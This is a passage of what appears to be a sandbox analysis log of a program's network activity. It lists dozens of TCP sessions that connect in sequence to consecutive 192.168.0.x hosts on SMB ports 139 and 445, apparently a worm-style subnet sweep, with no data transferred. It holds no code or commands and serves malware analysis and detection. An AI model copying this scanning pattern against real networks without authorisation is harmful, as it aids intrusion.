Handle	0x4f4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.45
Remote Port	139
Local Address	0.0.0.0
Local Port	49249
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.45, remote_port = 139		1	Fn

TCP Session #90

Information	Value
Handle	0x4f8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.45
Remote Port	445
Local Address	0.0.0.0
Local Port	49250
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.45, remote_port = 445		1	Fn

TCP Session #91

Information	Value
Handle	0x4fc
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.46
Remote Port	445
Local Address	0.0.0.0
Local Port	49251
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.46, remote_port = 445		1	Fn

TCP Session #92

Information	Value
Handle	0x500
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.46
Remote Port	139
Local Address	0.0.0.0
Local Port	49252
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.46, remote_port = 139		1	Fn

TCP Session #93

Information	Value
Handle	0x508
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.47
Remote Port	139
Local Address	0.0.0.0
Local Port	49253
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.47, remote_port = 139		1	Fn

TCP Session #94

Information	Value
Handle	0x50c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.47
Remote Port	445
Local Address	0.0.0.0
Local Port	49254
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.47, remote_port = 445		1	Fn

TCP Session #95

Information	Value
Handle	0x4e4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.48
Remote Port	139
Local Address	0.0.0.0
Local Port	49255
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.48, remote_port = 139		1	Fn

TCP Session #96

Information	Value
Handle	0x504
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.48
Remote Port	445
Local Address	0.0.0.0
Local Port	49256
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.48, remote_port = 445		1	Fn

TCP Session #97

Information	Value
Handle	0x514
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.49
Remote Port	445
Local Address	0.0.0.0
Local Port	49257
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.49, remote_port = 445		1	Fn

TCP Session #98

Information	Value
Handle	0x51c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.49
Remote Port	139
Local Address	0.0.0.0
Local Port	49258
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.49, remote_port = 139		1	Fn

TCP Session #99

Information	Value
Handle	0x518
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.50
Remote Port	139
Local Address	0.0.0.0
Local Port	49259
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.50, remote_port = 139		1	Fn

TCP Session #100

Information	Value
Handle	0x524
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.50
Remote Port	445
Local Address	0.0.0.0
Local Port	49260
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.50, remote_port = 445		1	Fn

TCP Session #101

Information	Value
Handle	0x528
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.51
Remote Port	445
Local Address	0.0.0.0
Local Port	49261
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.51, remote_port = 445		1	Fn

TCP Session #102

Information	Value
Handle	0x520
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.51
Remote Port	139
Local Address	0.0.0.0
Local Port	49262
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.51, remote_port = 139		1	Fn

TCP Session #103

Information	Value
Handle	0x4a8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.52
Remote Port	139
Local Address	0.0.0.0
Local Port	49263
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.52, remote_port = 139		1	Fn

TCP Session #104

Information	Value
Handle	0x510
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.52
Remote Port	445
Local Address	0.0.0.0
Local Port	49264
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.52, remote_port = 445		1	Fn

TCP Session #105

Information	Value
Handle	0x4e8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.53
Remote Port	445
Local Address	0.0.0.0
Local Port	49265
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.53, remote_port = 445		1	Fn

TCP Session #106

Information	Value
Handle	0x52c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.53
Remote Port	139
Local Address	0.0.0.0
Local Port	49266
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.53, remote_port = 139		1	Fn

TCP Session #107

Information	Value
Handle	0x534
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.54
Remote Port	445
Local Address	0.0.0.0
Local Port	49267
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.54, remote_port = 445		1	Fn

TCP Session #108

Information	Value
Handle	0x530
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.54
Remote Port	139
Local Address	0.0.0.0
Local Port	49268
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.54, remote_port = 139		1	Fn

TCP Session #109

Information	Value
Handle	0x538
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.55
Remote Port	139
Local Address	0.0.0.0
Local Port	49269
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.55, remote_port = 139		1	Fn

TCP Session #110

Information	Value
Handle	0x53c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.55
Remote Port	445
Local Address	0.0.0.0
Local Port	49270
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.55, remote_port = 445		1	Fn

TCP Session #111

Information	Value
Handle	0x540
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.56
Remote Port	445
Local Address	0.0.0.0
Local Port	49271
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.56, remote_port = 445		1	Fn

TCP Session #112

Information	Value
Handle	0x544
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.56
Remote Port	139
Local Address	0.0.0.0
Local Port	49272
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.56, remote_port = 139		1	Fn

TCP Session #113

Information	Value
Handle	0x548
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.57
Remote Port	139
Local Address	0.0.0.0
Local Port	49273
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.57, remote_port = 139		1	Fn

TCP Session #114

Information	Value
Handle	0x54c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.57
Remote Port	445
Local Address	0.0.0.0
Local Port	49274
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.57, remote_port = 445		1	Fn

TCP Session #115

Information	Value
Handle	0x350
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.58
Remote Port	445
Local Address	0.0.0.0
Local Port	49275
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.58, remote_port = 445		1	Fn

TCP Session #116

Information	Value
Handle	0x550
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.58
Remote Port	139
Local Address	0.0.0.0
Local Port	49276
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.58, remote_port = 139		1	Fn

TCP Session #117

Information	Value
Handle	0x554
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.59
Remote Port	139
Local Address	0.0.0.0
Local Port	49277
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.59, remote_port = 139		1	Fn

TCP Session #118

Information	Value
Handle	0x558
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.59
Remote Port	445
Local Address	0.0.0.0
Local Port	49278
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.59, remote_port = 445		1	Fn

TCP Session #119

Information	Value
Handle	0x55c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.60
Remote Port	445
Local Address	0.0.0.0
Local Port	49279
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.60, remote_port = 445		1	Fn

TCP Session #120

Information	Value
Handle	0x560
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.60
Remote Port	139
Local Address	0.0.0.0
Local Port	49280
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.60, remote_port = 139		1	Fn

TCP Session #121

Information	Value
Handle	0x564
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.61
Remote Port	139
Local Address	0.0.0.0
Local Port	49281
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.61, remote_port = 139		1	Fn

TCP Session #122

Information	Value
Handle	0x568
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.61
Remote Port	445
Local Address	0.0.0.0
Local Port	49282
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.61, remote_port = 445		1	Fn

TCP Session #123

Information	Value
Handle	0x56c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.62
Remote Port	445
Local Address	0.0.0.0
Local Port	49283
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.62, remote_port = 445		1	Fn

TCP Session #124

Information	Value
Handle	0x570
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.62
Remote Port	139
Local Address	0.0.0.0
Local Port	49284
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.62, remote_port = 139		1	Fn

TCP Session #125

Information	Value
Handle	0x574
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.63
Remote Port	139
Local Address	0.0.0.0
Local Port	49285
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.63, remote_port = 139		1	Fn

TCP Session #126

Information	Value
Handle	0x578
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.63
Remote Port	445
Local Address	0.0.0.0
Local Port	49286
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.63, remote_port = 445		1	Fn

TCP Session #127

Information	Value
Handle	0x57c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.64
Remote Port	445
Local Address	0.0.0.0
Local Port	49287
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.64, remote_port = 445		1	Fn

TCP Session #128

Information	Value
Handle	0x580
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.64
Remote Port	139
Local Address	0.0.0.0
Local Port	49288
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.64, remote_port = 139		1	Fn

TCP Session #129

Information	Value
Handle	0x33c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.65
Remote Port	139
Local Address	0.0.0.0
Local Port	49289
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.65, remote_port = 139		1	Fn

TCP Session #130

Information	Value
Handle	0x494
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.65
Remote Port	445
Local Address	0.0.0.0
Local Port	49290
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.65, remote_port = 445		1	Fn

TCP Session #131

Information	Value
Handle	0x58c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.66
Remote Port	445
Local Address	0.0.0.0
Local Port	49291
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.66, remote_port = 445		1	Fn

TCP Session #132

Information	Value
Handle	0x594
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.66
Remote Port	139
Local Address	0.0.0.0
Local Port	49292
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.66, remote_port = 139		1	Fn

TCP Session #133

Information	Value
Handle	0x4ac
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.67
Remote Port	139
Local Address	0.0.0.0
Local Port	49293
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.67, remote_port = 139		1	Fn

TCP Session #134

Information	Value
Handle	0x59c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.67
Remote Port	445
Local Address	0.0.0.0
Local Port	49294
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.67, remote_port = 445		1	Fn

TCP Session #135

Information	Value
Handle	0x590
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.68
Remote Port	445
Local Address	0.0.0.0
Local Port	49295
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.68, remote_port = 445		1	Fn

TCP Session #136

Information	Value
Handle	0x5a4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.68
Remote Port	139
Local Address	0.0.0.0
Local Port	49296
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.68, remote_port = 139		1	Fn

TCP Session #137

Information	Value
Handle	0x5a0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.69
Remote Port	139
Local Address	0.0.0.0
Local Port	49297
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.69, remote_port = 139		1	Fn

TCP Session #138

Information	Value
Handle	0x5a8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.69
Remote Port	445
Local Address	0.0.0.0
Local Port	49298
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.69, remote_port = 445		1	Fn

TCP Session #139

Information	Value
Handle	0x584
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.70
Remote Port	445
Local Address	0.0.0.0
Local Port	49299
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.70, remote_port = 445		1	Fn

TCP Session #140

Information	Value
Handle	0x598
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.70
Remote Port	139
Local Address	0.0.0.0
Local Port	49300
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.70, remote_port = 139		1	Fn

TCP Session #141

Information	Value
Handle	0x5b4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.71
Remote Port	139
Local Address	0.0.0.0
Local Port	49301
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.71, remote_port = 139		1	Fn

TCP Session #142

Information	Value
Handle	0x5b8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.71
Remote Port	445
Local Address	0.0.0.0
Local Port	49302
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.71, remote_port = 445		1	Fn

TCP Session #143

Information	Value
Handle	0x5c4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.72
Remote Port	445
Local Address	0.0.0.0
Local Port	49303
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.72, remote_port = 445		1	Fn

TCP Session #144

Information	Value
Handle	0x5c8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.72
Remote Port	139
Local Address	0.0.0.0
Local Port	49304
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.72, remote_port = 139		1	Fn

TCP Session #145

Information	Value
Handle	0x5cc
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.73
Remote Port	139
Local Address	0.0.0.0
Local Port	49305
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.73, remote_port = 139		1	Fn

TCP Session #146

Information	Value
Handle	0x5d0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.73
Remote Port	445
Local Address	0.0.0.0
Local Port	49306
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.73, remote_port = 445		1	Fn

TCP Session #147

Information	Value
Handle	0x5ac
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.74
Remote Port	445
Local Address	0.0.0.0
Local Port	49307
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.74, remote_port = 445		1	Fn

TCP Session #148

Information	Value
Handle	0x5bc
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.74
Remote Port	139
Local Address	0.0.0.0
Local Port	49308
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.74, remote_port = 139		1	Fn

TCP Session #149

Information	Value
Handle	0x5b0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.75
Remote Port	139
Local Address	0.0.0.0
Local Port	49309
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.75, remote_port = 139		1	Fn

TCP Session #150

Information	Value
Handle	0x5d8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.75
Remote Port	445
Local Address	0.0.0.0
Local Port	49310
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.75, remote_port = 445		1	Fn

TCP Session #151

Information	Value
Handle	0x5e4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.76
Remote Port	445
Local Address	0.0.0.0
Local Port	49311
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.76, remote_port = 445		1	Fn

TCP Session #152

Information	Value
Handle	0x5e8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.76
Remote Port	139
Local Address	0.0.0.0
Local Port	49312
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.76, remote_port = 139		1	Fn

TCP Session #153

Information	Value
Handle	0x5dc
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.77
Remote Port	139
Local Address	0.0.0.0
Local Port	49313
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.77, remote_port = 139		1	Fn

TCP Session #154

Information	Value
Handle	0x5ec
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.77
Remote Port	445
Local Address	0.0.0.0
Local Port	49314
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
